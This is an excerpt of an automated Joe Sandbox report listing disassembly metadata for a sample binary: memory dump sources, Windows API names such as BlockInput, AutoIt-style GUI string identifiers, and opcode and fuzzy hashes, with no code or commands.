                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: BlockInput
                                                                      • String ID:
                                                                      • API String ID: 3456056419-0
                                                                      • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                      • Instruction ID: 333757575bec944d8e9dbc8eb0d5b86d9c11ad8c8cb1b1bfa7003d46500149e5
                                                                      • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                      • Instruction Fuzzy Hash: BCE06D32B1C60286EB44BF62E1862BA62A0AB88B84F145434DA1EC7797EF7CD4949700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                      • Instruction ID: b7c8322e63f13f4fdb926ffca6c0d7d4edc8f2d3e699cf14317cea3e3b8e7385
                                                                      • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                      • Instruction Fuzzy Hash: ABC012B161C652D9E760EF24D8891DC3330F70031CF800021E60E9E869AF78C248D300
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                      • Instruction ID: 48cfd89916b9908ff4bd618dbef7297f6cca675beb372ed0f9f148a0bd564bf7
                                                                      • Opcode Fuzzy Hash: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                      • Instruction Fuzzy Hash: 3E41DF33718B4886EA04EF2AD5252A963A1BB4DFD0B49A032DE0ED7755EF3CD482D300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      • Opcode ID: cf50d128dd3344e2a26665cf24b57cc892866eab895f7b642e8f36e24e0f0ced
                                                                      • Instruction ID: 272292ad68524bea9539ec9314d6808147225454b0897f6b6b8d862a12ae9eec
                                                                      • Opcode Fuzzy Hash: cf50d128dd3344e2a26665cf24b57cc892866eab895f7b642e8f36e24e0f0ced
                                                                      • Instruction Fuzzy Hash: F4B09220E0BA02C2EA483B116C8721422A4BF48700F98823AC10CE0320EF2C20E96B50
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4b43b05b4d174de04649b256e334c2e39119974175c185e79b62e938d94deaa
                                                                      • Instruction ID: 111c248c8bade9b7468279128d90f494d17c5d0f74d08e205750aa948a2bd957
                                                                      • Opcode Fuzzy Hash: a4b43b05b4d174de04649b256e334c2e39119974175c185e79b62e938d94deaa
                                                                      • Instruction Fuzzy Hash: 7952B4B2A0C64281FA68FB15D09A67D23A5EF4DB84F154535DA1EE7A83EF3CE440E740
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_task
                                                                      • String ID:
                                                                      • API String ID: 118556049-0
                                                                      • Opcode ID: b0ee8499692bb5f0e66cf560804eec7270357b5d033001915289984488a2624d
                                                                      • Instruction ID: 16d7806f14ca5801cfb4cd81fb4dd8504b7e540ea14dae8525547f80acabaaa1
                                                                      • Opcode Fuzzy Hash: b0ee8499692bb5f0e66cf560804eec7270357b5d033001915289984488a2624d
                                                                      • Instruction Fuzzy Hash: 6A526A72B0DA428AEB10FF65D1552BC23A1EB44B98F508635DE1DE77D6EE38E405D380
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                      • Instruction ID: ef5fe0df7cf36c67bc0c73481ba7eece5284dfd891f5980408aa8aca5e062081
                                                                      • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                      • Instruction Fuzzy Hash: 59423122D2DE4A85E693BF75A4536396724BF563C1F418337E80EF6652FF2CA442A700
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                      • Instruction ID: 3c9e060af515ed8b37b44f3ed44d595c694e441a73db8b9048adc13a5d71c6fb
                                                                      • Opcode Fuzzy Hash: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                      • Instruction Fuzzy Hash: 6B713C22E0D64286F774BA29858273C6291AF80370F142638DA5DE76C7FE7DE841A780
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                      • Instruction ID: e955881dfd40e029dd68578035d2d482264ea615a9aee42510eb22cd78ba3f62
                                                                      • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                      • Instruction Fuzzy Hash: 0FF04472B182558ADB94AF2CA44362977A0E708380B908039D589D3E44DE3C90919F14
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 3521893082-0
                                                                      • Opcode ID: fe06bb78312fff6951394ff3b716a9e64ae5b32195cd69004ecd3670ec3cc0ab
                                                                      • Instruction ID: 5e6f534f6bb167d8116a75f2ac129be5278b99f08e20ec0eea99c2542c9aff55
                                                                      • Opcode Fuzzy Hash: fe06bb78312fff6951394ff3b716a9e64ae5b32195cd69004ecd3670ec3cc0ab
                                                                      • Instruction Fuzzy Hash: CDA1B032F0CA1286FB54BBA1D84667C2761BB48BA5F104234CE2EE7BD6EF3C94449740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                      • Instruction ID: 92869a61f13b4e5467b5456bb097a800e19b23491af9c6e9f9999b5371ff4236
                                                                      • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                      • Instruction Fuzzy Hash: 9EB15061F0CA8290FB94BB65D5421B82362BB50784B984231DD4EF7A9BFF2CE945F700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 2e7055967c205f2c24f3966e04cd442a46f117a0c11a7a65ef2fe32a8ecfae5d
                                                                      • Instruction ID: 3574cca9e2f9d2838a7318bf76cebb0f572ec2a23686cfaddc660b5d98fda589
                                                                      • Opcode Fuzzy Hash: 2e7055967c205f2c24f3966e04cd442a46f117a0c11a7a65ef2fe32a8ecfae5d
                                                                      • Instruction Fuzzy Hash: EC71A336A0CA4286E764BB51E84667A7361FB89BA1F004234DE6ED3B95EF3CD444DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: tooltips_class32
                                                                      • API String ID: 698492251-1918224756
                                                                      • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                      • Instruction ID: 4e720a49359b2fd2f69721cb1ef348d3d5ba2cc8c8a01c479442c821fa331a31
                                                                      • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                      • Instruction Fuzzy Hash: 0FC16133A08B418AE754EF65E4462AE77A0FB89B94F500035DA5ED7765EF3CE441DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                      • String ID: @
                                                                      • API String ID: 3869813825-2766056989
                                                                      • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                      • Instruction ID: 134b25e28c4bed45fdab62834c26d51a20908f2ca797117baa96459e58967e4c
                                                                      • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                      • Instruction Fuzzy Hash: 50815932A08A468AE744FF75D85666D33A0FB44B88F408531DE4EE7799EF38D845D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Color$LongWindow$ModeObjectStockText
                                                                      • String ID:
                                                                      • API String ID: 554392163-0
                                                                      • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                      • Instruction ID: 15ce937f1c0fdd370ac86ccc9737078272b1a190695f1ad2e1e12a47ea1d1d91
                                                                      • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                      • Instruction Fuzzy Hash: F8813B31D0CA5341FAB4BB29954A2B923A1FF45760F540631C99DE72E6FF3CA846E740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 222038402-1459072770
                                                                      • Opcode ID: 1e4c30ac192ba7e87f4a414e8ce6a97dcba2c32a0ddf4e3228324d065e3a1a5d
                                                                      • Instruction ID: f20fdf78f89cf28106a1cc4fa4983af1bd9c325fe2c24242c18c5951e55d64aa
                                                                      • Opcode Fuzzy Hash: 1e4c30ac192ba7e87f4a414e8ce6a97dcba2c32a0ddf4e3228324d065e3a1a5d
                                                                      • Instruction Fuzzy Hash: 7F518E62B0C64296EA14FB2699021B96391AF85FD0F448431ED1DEBB97FF3CE501EB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharMessageSendUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 3974292440-4258414348
                                                                      • Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                      • Instruction ID: a916f6f09d1997cd8302d29a56ccfd4c18a21cf690a12bfb97c094873bde4ade
                                                                      • Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                      • Instruction Fuzzy Hash: C312D113B1C65382FE54BB69881B1BD67A1AF94B94B4C4931DE4DE6393FE3CE841A310
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 2091158083-3440237614
                                                                      • Opcode ID: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                      • Instruction ID: f908087c97a48c7518b9a6fbd26693ae12a5d7a8ac6ce995f8aae77f4ec0883f
                                                                      • Opcode Fuzzy Hash: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                      • Instruction Fuzzy Hash: 6171613261CA8296E750FB55E8467ED7720FB84794F800032EA4EE7A9AEF7CD549D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                      • Instruction ID: ea82e133925bfe312baf41b6bad35fa10fb421b26a1fda04939f25eb31fa7873
                                                                      • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                      • Instruction Fuzzy Hash: CF518936B18B41C6EB54EF66E80AAAD33A0FB88B95B504131DE1E93B55EF3DD405DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
